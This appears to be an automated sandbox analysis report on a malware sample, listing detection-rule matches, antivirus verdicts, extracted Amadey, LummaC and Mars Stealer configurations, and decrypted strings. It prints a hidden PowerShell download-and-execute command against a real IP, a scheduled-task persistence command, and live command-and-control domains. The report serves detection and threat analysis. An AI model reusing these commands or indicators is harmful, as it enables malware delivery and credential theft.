Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7248, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 7392, ProcessName: schtasks.exe
                                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe
                                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe
                                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 5232, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})", ProcessId: 1812, ProcessName: powershell.exe

Data Obfuscation

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: M6gQuZPvgY.exe, Avira: detected
Source: https://gunrightsp.run:443/bksaHygicrosoft, Avira URL Cloud: Label: malware
Source: http://185.215.113.209/Di0Her478/index.php101, Avira URL Cloud: Label: malware
Source: https://gunrightsp.run/bksaHygu, Avira URL Cloud: Label: malware
Source: https://gunrightsp.run/bksaHyg0, Avira URL Cloud: Label: malware
Source: http://185.215.113.209/Di0Her478/index.php, Avira URL Cloud: Label: malware
Source: https://gunrightsp.run/bksaHyg, Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\crypted.41[1].exe, Avira: detection malicious, Label: TR/Kryptik.jihlg
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mrwipre12[1].exe, Avira: detection malicious, Label: TR/Crypt.Agent.fdbkv
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[2].exe, Avira: detection malicious, Label: TR/ATRAPS.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\amnew[1].exe, Avira: detection malicious, Label: TR/Redcap.zvzjx
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exe, Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\cronikxqqq[1].exe, Avira: detection malicious, Label: TR/Kryptik.zivzb
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\UD49QH6[1].exe, Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe, Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe, Avira: detection malicious, Label: TR/AD.PSLoader.wdbmn
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe, Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\dw[1].exe, Avira: detection malicious, Label: TR/Agent.rdnbz
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe, Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: LummaC {"C2 url": ["codxefusion.top", "hardswarehub.today", "gadgethgfub.icu", "hardrwarehaven.run", "techmindzs.live", "quietswtreams.life", "techspherxe.top"], "Build id": "CRON--@CRONLOGS"}
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, Malware Configuration Extractor: Amadey {"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}
Source: 17.2.m0wsoI3.exe.400000.0.unpack, Malware Configuration Extractor: Mars Stealer {"C2 url": "ctrlgem.xyz/gate.php"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\UD49QH6[1].exe, ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\cronikxqqq[1].exe, ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\crypted.41[1].exe, ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\random[1].exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\crypted.7[1].exe, ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exe, ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\trano1221[1].exe, ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\dw[1].exe, ReversingLabs: Detection: 25%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mrwipre12[1].exe, ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\amnew[1].exe, ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe, ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\v7942[1].exe, ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Local\TempLFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE, ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE, ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe, ReversingLabs: Detection: 20%
Source: C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe, ReversingLabs: Detection: 95%
Source: C:\Users\user\AppData\Local\Temp\10019520101\dw.exe, ReversingLabs: Detection: 25%
Source: C:\Users\user\AppData\Local\Temp\10026630101\v7942.exe, ReversingLabs: Detection: 16%
Source: C:\Users\user\AppData\Local\Temp\10028100101\crypted.exe, ReversingLabs: Detection: 50%
Source: C:\Users\user\AppData\Local\Temp\10028410101\crypted.exe, ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Local\Temp\10029600101\mrwipre12.exe, ReversingLabs: Detection: 79%
Source: C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe, ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe, ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe, ReversingLabs: Detection: 84%
Source: C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe, ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Local\Temp\10235940101\0629403be8.exe, ReversingLabs: Detection: 56%
Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe, ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe, ReversingLabs: Detection: 81%
Source: M6gQuZPvgY.exe, Virustotal: Detection: 60%
Source: M6gQuZPvgY.exe, ReversingLabs: Detection: 61%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, String decryptor: codxefusion.top
Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, String decryptor: hardswarehub.today
Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, String decryptor: gadgethgfub.icu
Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, String decryptor: hardrwarehaven.run
Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, String decryptor: techmindzs.live
Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, String decryptor: quietswtreams.life
Source: 00000030.00000002.1789794863.0000000003C89000.00000004.00000800.00020000.00000000.sdmp, String decryptor: techspherxe.top
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: 176.113.115.6
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: /Ni9kiput/index.php
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: S-%lu-
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: bb556cff4a
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: rapes.exe
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Startup
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: cmd /C RMDIR /s/q
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: rundll32
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Programs
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: %USERPROFILE%
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: cred.dll|clip.dll|
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: cred.dll
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: clip.dll
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: http://
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: https://
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: /quiet
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: /Plugins/
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: &unit=
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: shell32.dll
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: kernel32.dll
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: GetNativeSystemInfo
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: ProgramData\
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: AVAST Software
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Kaspersky Lab
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Panda Security
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Doctor Web
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: 360TotalSecurity
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Bitdefender
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Norton
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Sophos
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Comodo
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: WinDefender
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: 0123456789
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: ------
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: ?scr=1
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: ComputerName
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: -unicode-
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: VideoID
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: DefaultSettings.XResolution
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: DefaultSettings.YResolution
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: ProductName
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: CurrentBuild
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: rundll32.exe
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: "taskkill /f /im "
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: " && timeout 1 && del
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: && Exit"
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: " && ren
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Powershell.exe
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: -executionpolicy remotesigned -File "
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: shutdown -s -t 0
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: random
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: Keyboard Layout\Preload
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: 00000419
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: 00000422
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: 00000423
Source: 00000000.00000002.1004894456.0000000000201000.00000040.00000001.01000000.00000003.sdmp, String decryptor: 0000043f
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: LoadLibraryA
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: LoadLibraryA
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetProcAddress
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetProcAddress
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: ExitProcess
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: ExitProcess
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: advapi32.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: advapi32.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: crypt32.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: crypt32.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetTickCount
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetTickCount
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: Sleep
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: Sleep
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetUserDefaultLangID
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetUserDefaultLangID
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: CreateMutexA
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: CreateMutexA
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetLastError
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetLastError
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: HeapAlloc
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: HeapAlloc
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetProcessHeap
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetProcessHeap
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetComputerNameA
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetComputerNameA
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: VirtualProtect
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: VirtualProtect
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetCurrentProcess
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetCurrentProcess
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: VirtualAllocExNuma
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: VirtualAllocExNuma
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetUserNameA
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: GetUserNameA
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: CryptStringToBinaryA
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: CryptStringToBinaryA
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: HAL9TH
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: HAL9TH
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: JohnDoe
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: JohnDoe
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: 21/04/2022 20:00:00
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: 21/04/2022 20:00:00
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: http://
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: http://
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: Default
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: Default
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: %hu/%hu/%hu %hu:%hu:%hu
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: %hu/%hu/%hu %hu:%hu:%hu
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: open
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: open
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: sqlite3.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: sqlite3.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: C:\ProgramData\sqlite3.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: C:\ProgramData\sqlite3.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: freebl3.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: freebl3.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: C:\ProgramData\freebl3.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: C:\ProgramData\freebl3.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: mozglue.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: mozglue.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: C:\ProgramData\mozglue.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: C:\ProgramData\mozglue.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: msvcp140.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: msvcp140.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: C:\ProgramData\msvcp140.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: C:\ProgramData\msvcp140.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: nss3.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: nss3.dll
Source: 17.2.m0wsoI3.exe.400000.0.unpack, String decryptor: C:\ProgramData\nss3.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: C:\ProgramData\nss3.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: softokn3.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: softokn3.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: C:\ProgramData\softokn3.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: C:\ProgramData\softokn3.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: vcruntime140.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: vcruntime140.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: C:\ProgramData\vcruntime140.dll
                                      Source: 17.2.m0wsoI3.exe.400000.0.unpackString decryptor: C:\ProgramData\vcruntime140.dll
